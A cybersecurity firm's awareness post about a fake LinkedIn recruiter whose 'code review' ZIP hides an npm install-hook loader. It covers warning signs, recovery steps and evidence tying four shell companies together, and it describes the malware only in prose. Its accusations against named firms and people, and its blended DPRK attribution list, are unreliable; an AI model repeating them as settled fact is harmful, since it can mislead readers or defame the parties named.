Scam Awareness

Fake LinkedIn Recruiter Malware Scam (Trifleck)

A LinkedIn recruiter from 'Trifleck' tried to install malware on a Bengaluru engineer. How to spot the pattern, what to do if hit, and the full forensic record.

SS&AK
Sai Samarth & Ashok Kamat
Cybersecify
9 min read

Last updated 2026-05-20. The full forensic investigation (four-entity shell cluster, smoking-gun WHOIS, IOCs, attribution detail, evidence pack) now lives at /investigations/trifleck-shell-cluster/. This post is the buyer-facing summary plus action steps.

The short answer. A senior frontend engineer in Bengaluru was targeted by a fake LinkedIn recruiter pretending to work at a US software firm called Trifleck. The “code review” task before the technical interview was a malware ZIP. Trifleck has no verifiable business registration in Florida or Delaware, the recruiter’s photo was stolen from a 14-year-old Gravatar profile, and the company is one of four shell fronts that share registrar, nameservers, and an Iceland-proxied WHOIS. Two of the four domains were registered three hours apart. This is the publicly documented Contagious Interview campaign attributed by Microsoft, Mandiant, Palo Alto Unit 42, and the FBI to DPRK-aligned threat actors. Action steps follow below. For the full forensic record, read the investigation.

Key findings

  • One shell operator runs four entities (Trifleck, Fleck Publisher, Virginia Book Publisher, The Creative Unit). Two domains registered 3 hours 10 minutes apart on 2025-05-21, same registrar Namecheap, same Iceland privacy proxy, same DNS provider Vilords. No US business registration for Trifleck or Fleck Publisher.
  • The recruiter photo is reverse-image-traceable to a 14-year-old Gravatar account (pastorwynn), unambiguously predating the trifleck.com domain by more than a decade.
  • The malware vector is an npm preinstall or postinstall hook inside a Blockstar.zip codebase the recruiter sends as a pre-interview code review task. On npm install, the hook executes a loader that calls a command and control server.
  • The campaign cluster is attributed to DPRK threat actors by Microsoft (Sapphire Sleet), Palo Alto Unit 42 (CL-STA-0240), Mandiant (UNC5342), Trend Micro (Void Dokkaebi / Famous Chollima), and the FBI (TraderTraitor). Active since December 2022.
  • Defence: refuse pre-interview code review tasks, run npm install —ignore-scripts on every unverified codebase, inspect package.json scripts before extraction, reverse-image-search recruiter photos. Five habits defeat the entire variant family at zero cost.

Cybersecify is a Bengaluru-based cybersecurity firm. We verify suspicious recruitment outreach for engineers, founders, and individuals before files get clicked, free. The full forensic record on the Trifleck cluster (WHOIS pairing, employee profile analysis, infrastructure diagrams, IOCs, attribution detail) lives at the linked investigation, and a redacted sample pentest report shows the structure we use when our SaaS clients ask for evidence of malicious-package detection during third-party dependency reviews.

The setup

The target, who has shared his account publicly on LinkedIn, is Anil N, a senior frontend engineer with fifteen years of experience including time at io.net and Vimeo. On May 6 2026, he received a LinkedIn connection request and direct message from a person named John Burleson, claiming to be COO at a company called Trifleck.

The opening message read:

“Hi, @Anil N. Glad to know you on LinkedIn. Are you able to work remotely? Hiring for a Frontend expert ($50-$100/h) at Trifleck. Trifleck is a B2B software development and digital growth partner helping businesses design, build, and scale high-impact digital products. Your background looks like a strong match. Would you be open to hearing a bit more about the role?”

The pay range was above market. The company description was clean and plausible. The pitch did not feel like a scam at first read.

Over the next 24 hours, the conversation moved through a familiar recruitment arc. Burleson asked a few screening questions, sent a project brief PDF, scheduled a call through a second persona’s Calendly, and shared a Google Drive ZIP labeled Blockstar.zip with explicit instructions to read the README first.

The README, when extracted in a safe environment, contained a single instruction: run git checkout dev to access the latest MVP. The malicious payload lived in that dev branch. VirusTotal flagged the archive under the Trojan-Downloader.Shell.Agent family. On npm install, a preinstall or postinstall hook would have executed a loader that called a remote command and control server and pulled follow-on stages.

He recognised the pattern in time and did not run the code. What follows is the action sequence: how to spot this pattern before you click, what to do if you have already run the code, and how to get verification help.

How to spot this pattern before you click

A few rules that would have caught this scam at multiple stages.

Verify the recruiter against the company. A real recruiter is on the company’s LinkedIn employee list. If they are not, ask why. “I don’t use LinkedIn often” is not an acceptable answer from a recruiter, and “check again” two minutes later is operator behavior, not real-person behavior.

Verify the company against business registries. A real company in the United States, United Kingdom, Singapore, or Australia has a business registration you can look up in 30 seconds through the relevant state or national registry. A real company in India has a CIN you can verify on the MCA portal. Polished websites cost a few hundred dollars and a weekend. Business registrations cost more and take longer.

Treat unsolicited recruitment that skips resume review as a strong signal. Real recruiters want your CV before they hand you assignments. If a recruiter is sending you the project codebase before reading your resume, the goal is not hiring.

Inspect archives without extracting locally. Use an online archive viewer or a disposable VM. Read package.json first. Look at every entry under scripts. If prepare, postinstall, or preinstall invoke something you did not expect, stop and read what they invoke before going further.

Treat any “review the codebase before the interview” instruction with suspicion. This is the single most consistent fingerprint of the Contagious Interview campaign across all documented variants. Legitimate companies do not require local execution of an unvetted codebase as a pre-interview screening step.

If you fit the targeting profile (current or former crypto firm employee, Web3 developer, holder of crypto), treat all unsolicited recruitment with extra skepticism for the next 24 months. This campaign cluster has been documented continuously since December 2022. There is no sign of it slowing down.

What to do if you have already run the code

If you have already cloned the repository and run npm install, treat this as a confirmed compromise and move fast.

  1. Disconnect the machine from the network immediately. Pull the ethernet cable, turn off Wi-Fi. Stop further exfiltration.
  2. Rotate every credential the machine had access to. Browser-saved passwords. Cloud CLI tokens (AWS, GCP, Azure). SSH keys. GitHub personal access tokens. npm publish tokens. API keys in .env files. Anything the shell environment had read access to should be considered compromised.
  3. Move funds from a clean device if crypto wallet seed phrases were on the machine. Assume any wallet extension data is compromised. Use a different, clean computer to access wallet recovery, and move funds to a new wallet whose seed phrase was never on the affected device.
  4. Reimage the machine. Do not clean it. A compromised endpoint is not trusted recovery infrastructure. Persistence mechanisms can survive AV cleanup. Full reimage is the only safe path forward.
  5. Going forward, run npm install --ignore-scripts on any codebase from an unverified source. Lifecycle hooks will not fire automatically. You can rebuild specific packages manually with npm rebuild <package> once you have inspected them. This single habit defeats the entire family of preinstall/postinstall malware.
  6. Notify your employer’s security team. If the affected machine had access to corporate resources, treat this as a corporate incident, not a personal one. Time to disclosure matters.

If you need help with forensic confirmation or with rotating credentials at scale, reach out via the verification line below. We can help you scope what was likely accessed and walk through the rotation sequence.

Not Sure If Your Recruiter Is Real?

Send us the recruiter’s name, their LinkedIn URL, the company they claim to represent, and any file or link they shared. We will tell you if it’s a real recruitment process or a scam.

No charges. No judgment.

What Happens When You Contact Us

  • We do not report you to the police
  • We do not ask for documents or payments
  • We do not interrogate or judge
  • We only verify whether it’s real or a scam

Need Help Beyond Verification?

If you have already lost money or credentials, or need help with FIR filing or reporting through the National Cybercrime Portal (cybercrime.gov.in), reach out via the same WhatsApp number. Evidence preservation and complaint assistance is a paid service.

What the investigation found (summary)

The full forensic record is at /investigations/trifleck-shell-cluster/. The headlines:

  • Trifleck is one of four shell entities sharing infrastructure: Trifleck, Fleck Publisher, Virginia Book Publisher, and The Creative Unit. All four surfaced in each other’s LinkedIn “Pages people also viewed” sidebar. Two of them list the identical street address (8201 Greensboro Dr, McLean VA 22102). The Creative Unit’s LinkedIn page has been deleted entirely.
  • The structural smoking gun: trifleck.com and fleckpublisher.com were registered three hours and ten minutes apart on the same day (2025-05-21), with the same registrar (Namecheap), behind the same anonymous Icelandic privacy proxy (Withheld for Privacy ehf), using the same budget DNS provider (Vilords). This is shared-operator evidence at a level that does not require LinkedIn correlation to interpret.
  • No business registration in Florida or Delaware under Trifleck or Fleck Publisher. The trifleck.com Terms of Service ships with literal unfilled (email address) and (business address) template placeholders in Section 14.
  • The recruiter’s photo was stolen from a 14-year-old Gravatar account (pastorwynn), unambiguously predating the trifleck.com domain by more than a decade.
  • Workforce composition does not match the claimed business: 9 HR, 8 business development, 5 IT, 5 sales at a claimed B2B software development agency. More HR staff than engineers.
  • Backdated tenures: four employees in four different countries with identical “5 years 1 month” tenure at a company whose domain is twelve months old.
  • Both recruiter personas were deleted from LinkedIn after our Day 1 inquiry was sent.
  • Blockstar Corporation in Chicago is a real and unrelated company (blockchain services firm founded 2020). The malicious project pretext name Blockstar.zip does not connect to them in any way.

The Trifleck / Blockstar instance had not appeared in any prior public report. Our investigation is the first public record of this specific cluster and the structural shared-infrastructure evidence tying the four entities to a single operator.

This is the publicly documented Contagious Interview campaign, attributed by Microsoft Threat Intelligence (Sapphire Sleet), Palo Alto Unit 42 (CL-STA-0240), Mandiant (UNC5342), Trend Micro (Void Dokkaebi / Famous Chollima), the FBI (TraderTraitor), and multiple other security vendors to DPRK-aligned threat actors. The campaign has been continuously active since December 2022 and shows no signs of slowing.

Who we are

Cybersecify is a Bengaluru-based cybersecurity consultancy. We help engineers, founders, and individuals verify suspicious recruitment outreach, suspicious calls, suspicious messages, and suspicious files before they turn into financial or operational damage.

We are not police. We are not a takedown service. We verify.

Disclaimer

This writeup is for public awareness. Cybersecify is an independent cybersecurity consultancy and is not affiliated with or endorsed by any law enforcement or government agency. For the avoidance of doubt: Blockstar Corporation, a Chicago-based blockchain services firm founded in 2020 that focuses on real estate tokenization, is a real and unrelated company. The reused project pretext name Blockstar.zip does not connect to Blockstar Corporation in any way. The full disclaimer and audit trail live in the investigation.

For emergencies or legal reporting in India, contact official authorities or use the National Cybercrime Helpline 1930.

Frequently Asked Questions

What is the Trifleck fake recruiter scam?

Trifleck is a shell front used in a publicly documented DPRK-aligned recruitment lure called the Contagious Interview campaign. A LinkedIn recruiter claiming to work at a US software firm called Trifleck approaches an engineer with an above-market remote role, then sends a code review task (named Blockstar in the documented case) that contains an npm preinstall or postinstall hook. The hook executes a loader on npm install, calls out to a command and control server, and pulls follow-on malware stages. The company has no verifiable business registration, the recruiter photo is stolen from an old Gravatar account, and the domain shares registrar, nameservers, and Iceland-proxied WHOIS with three sister shell entities registered within hours of each other.

Who is the DPRK Contagious Interview campaign targeting?

Current and former crypto firm employees, Web3 developers, blockchain engineers, and software engineers with publicly visible LinkedIn profiles signalling crypto wallet access or production credential access. Microsoft Threat Intelligence tracks the cluster as Sapphire Sleet. Palo Alto Unit 42 tracks it as CL-STA-0240. Mandiant tracks it as UNC5342. Trend Micro tracks it as Void Dokkaebi or Famous Chollima. The FBI tracks it as TraderTraitor. The campaign has been continuously active since December 2022 and has not slowed. If your LinkedIn profile signals crypto firm tenure, Web3 protocol work, or DevOps access to production crypto infrastructure, treat all unsolicited recruitment with extra skepticism for the next 24 months.

What do I do if I already ran the Blockstar code on my machine?

Treat the machine as confirmed compromised. Disconnect from the network immediately by pulling ethernet and turning off Wi-Fi. Rotate every credential the machine had access to: browser-saved passwords, cloud CLI tokens (AWS, GCP, Azure), SSH keys, GitHub personal access tokens, npm publish tokens, API keys in .env files. Move funds from a clean device if crypto wallet seed phrases were on the machine. Reimage the device, do not clean it. Persistence mechanisms can survive AV cleanup. Notify your employer security team if corporate resources were reachable. Going forward, run npm install with the --ignore-scripts flag on any codebase from an unverified source.

How do I spot a fake LinkedIn recruiter before clicking?

Six checks defeat almost all variants. One, verify the recruiter against the company employee list on LinkedIn. Two, verify the company against the relevant business registry (US state Secretary of State, UK Companies House, Singapore ACRA, Australia ASIC, India MCA portal). Three, treat unsolicited recruitment that skips resume review as a strong signal. Four, inspect any archive without extracting locally; read package.json first, look at every script entry, refuse anything with preinstall or postinstall hooks invoking unfamiliar binaries. Five, refuse the review-the-codebase-before-the-interview ask. Six, reverse image search the recruiter photo through Google Images or TinEye. The Trifleck case failed checks 2, 4, and 6.

What are the structural signs that Trifleck and Fleck Publisher are the same operator?

Five pieces of shared infrastructure tie the four shell entities (Trifleck, Fleck Publisher, Virginia Book Publisher, The Creative Unit) to one operator. trifleck.com and fleckpublisher.com were registered three hours and ten minutes apart on 2025-05-21 with the same registrar Namecheap, behind the same anonymous Icelandic privacy proxy Withheld for Privacy ehf, using the same budget DNS provider Vilords. Two entities list the identical street address 8201 Greensboro Dr McLean VA 22102. All four surfaced in each other LinkedIn Pages people also viewed sidebar. No business registration exists for Trifleck or Fleck Publisher in Florida or Delaware. The trifleck.com Terms of Service ships with literal unfilled (email address) and (business address) template placeholders. The full evidence pack including WHOIS records, registration timestamps, employee profile screenshots, and infrastructure diagrams lives in the linked investigation.

Is Blockstar Corporation in Chicago involved in this scam?

No. Blockstar Corporation is a real and unrelated Chicago-based blockchain services firm founded in 2020 focused on real estate tokenization. They have a verifiable business presence, active executive team, and legitimate operations. The malicious project pretext name Blockstar.zip used in the Trifleck lure does not connect to Blockstar Corporation in any way. This article and the linked forensic investigation explicitly clarify the lack of connection to protect the real Blockstar Corporation from reputation harm caused by the pretext reuse.

How do I verify recruitment outreach for free?

Cybersecify runs a free verification service for suspicious recruitment messages. Send the recruiter name, their LinkedIn URL, the company they claim to represent, and any file or link they shared via WhatsApp to +91 99644 43350 or email help@cybersecify.com. We tell you whether the pattern matches a known scam cluster (Contagious Interview, Trifleck shell family, OPSEC-failed crypto recruitment fronts) or whether the recruitment looks real. No charges, no judgment, no police escalation. Verification is the only output. If you need hands-on incident response after running malicious code, evidence preservation, or coordinated credential rotation at scale, that becomes a paid engagement; we scope it case by case and tell you honestly whether we can help.

What internal habits stop preinstall and postinstall malware?

Two habits defeat the entire malware family. First, run npm install --ignore-scripts on every codebase from an unverified source. Lifecycle hooks (preinstall, install, postinstall, prepare) will not fire automatically. You can rebuild specific packages manually with npm rebuild package-name once you have inspected each one. Second, do every unfamiliar codebase exploration inside a disposable VM or container with no network access to your credential stores. The disposable environment is the difference between a five-minute investigation and a five-day incident response. Both habits cost nothing to adopt and are zero-friction for legitimate work.

How does the Contagious Interview campaign filter for Web3 and crypto targets?

Three filtering signals appear consistently across documented Contagious Interview variants. One, the LinkedIn profile signals current or former crypto firm tenure, Web3 protocol development, blockchain engineering, or smart contract auditing experience. Two, the profile shows DevOps or platform engineering roles with implied production credential access at a target firm. Three, the public engagement pattern (LinkedIn posts, GitHub commits, conference talks) signals active employment rather than between-jobs status. The recruitment lure is tuned to the same profile across operators: an above-market remote role with an early code review task, often labelled as a frontend or full-stack assignment but containing crypto-adjacent dependencies in package.json. The selection bias is the goal: filter for credential-rich targets at crypto-adjacent firms where the malware payoff (wallet seed phrases, production cloud credentials, signing keys) justifies the social engineering cost. Microsoft, Mandiant, Palo Alto Unit 42, Trend Micro, and the FBI have all published indicator sets confirming this targeting pattern.

Where is the full forensic record on the Trifleck shell cluster?

The complete forensic investigation lives at /investigations/trifleck-shell-cluster/ on cybersecify.com. It includes the four-entity shell cluster mapping (Trifleck, Fleck Publisher, Virginia Book Publisher, The Creative Unit), the smoking-gun WHOIS pairing (trifleck.com and fleckpublisher.com registered 3 hours 10 minutes apart on 2025-05-21 with identical registrar Namecheap, identical Iceland privacy proxy Withheld for Privacy ehf, identical DNS provider Vilords), employee profile analysis (9 HR, 8 business development, 5 IT, 5 sales workforce composition mismatch at a claimed B2B software development agency), backdated tenure evidence (four employees in four different countries with identical 5 years 1 month tenure at a 12-month-old domain), recruiter photo reverse-image-search results (14-year-old Gravatar account pastorwynn), and the Indicators of Compromise (IOCs) pack. Microsoft Threat Intelligence Sapphire Sleet, Palo Alto Unit 42 CL-STA-0240, Mandiant UNC5342, Trend Micro Void Dokkaebi / Famous Chollima, and FBI TraderTraitor attribution detail is included with primary-source links.

Need help verifying a scam?

Free verification and knowledge sharing. WhatsApp +91 99644 43350 or email help@cybersecify.com. For active fraud in the last 24 hours, call the National Cybercrime Helpline 1930 first.

Share this article
fake recruiter scamLinkedIn recruitment fraudContagious Interviewmalware analysisDPRKTrifleck scamBengaluru